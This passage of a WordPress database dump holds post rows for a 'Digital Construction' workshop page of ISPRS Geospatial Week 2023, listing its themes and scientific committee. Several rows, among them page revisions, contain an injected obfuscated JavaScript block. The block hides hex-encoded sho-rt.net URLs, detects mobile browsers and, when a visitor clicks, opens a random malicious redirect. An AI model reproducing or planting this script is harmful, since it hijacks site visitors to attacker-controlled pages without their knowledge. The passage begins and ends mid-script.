)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','publish','closed','closed','','digital-construction','','','2023-02-05 13:57:25','2023-02-05 13:57:25','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2712',0,'dt_portfolio','',0),
(2713,1,'2022-10-09 04:43:56','2022-10-09 04:43:56','','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-09 04:43:56','2022-10-09 04:43:56','',2712,'https://gsw2023.com/?p=2713',0,'revision','',0),
(2714,1,'2022-10-09 04:46:29','2022-10-09 04:46:29','','ws10','','inherit','open','closed','','ws10','','','2022-10-09 04:46:29','2022-10-09 04:46:29','',2712,'https://gsw2023.com/wp-content/uploads/2022/10/ws10.jpg',0,'attachment','image/jpeg',0),
(2715,1,'2022-10-09 04:50:31','2022-10-09 04:50:31','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-09 04:50:31','2022-10-09 04:50:31','',2712,'https://gsw2023.com/?p=2715',0,'revision','',0),
(2716,1,'2022-10-09 05:01:09','2022-10-09 05:01:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 